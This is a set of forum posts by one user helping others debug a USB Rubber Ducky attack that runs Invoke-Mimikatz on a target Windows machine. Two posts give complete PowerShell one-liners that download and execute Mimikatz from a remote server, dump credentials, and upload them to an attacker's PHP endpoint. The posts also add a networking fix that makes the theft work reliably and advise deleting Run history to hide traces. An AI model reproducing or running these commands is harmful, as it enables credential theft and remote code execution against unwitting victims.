Everything posted by shr00mie

  1. This is what you're looking for. https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz
  2. 1 - your rubber ducky script is out of order. you're deleting run history and then running the script. somewhat counterproductive as your last command would still remain. delete run history after running script.

     2 - open PS as admin and run the below code in the window. see what the output says. an empty file indicates that the content of the variable is being sent from PS to the web server, but there's no content. this would lead me to believe that there's an issue either downloading or running mimikatz.

         IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)
  3. i was having the same problem. definitely spent quite a bit of time on the interwebs trying to figure this particular bitch out. turns out it has something to do with HTML1.0 vs 1.1 and how it relates to the "Expect and 100 (Continue)" component: http://www8.org/w8-papers/5c-protocols/key/key.html

     while someone provided the solution, the trick is that it has to be the first command in the line. current working theory is that after PS loads net.webclient, you are no longer able to alter the configuration it's already running as for the remainder of the session. if you, on the other hand, change the setting before any net.webclient components are loaded in the session, subsequent net.webclient instances launched for the remainder of the session will pull from this configuration. below is how i finally got the code to work without throwing any errors on the PS side.

         [System.Net.ServicePointManager]::Expect100Continue = $false ; IEX (New-Object Net.WebClient).DownloadString('http://ADDRESS/im.ps1') ; $output = Invoke-Mimikatz -DumpCreds ; (New-Object Net.WebClient).UploadString('http://ADDRESS/rx.php' , $output )

     then i banged my head against the table for a good 24 hours trying to figure out why the server/rx.php script wasn't creating the .creds file. a good night's sleep and a clear head did the trick.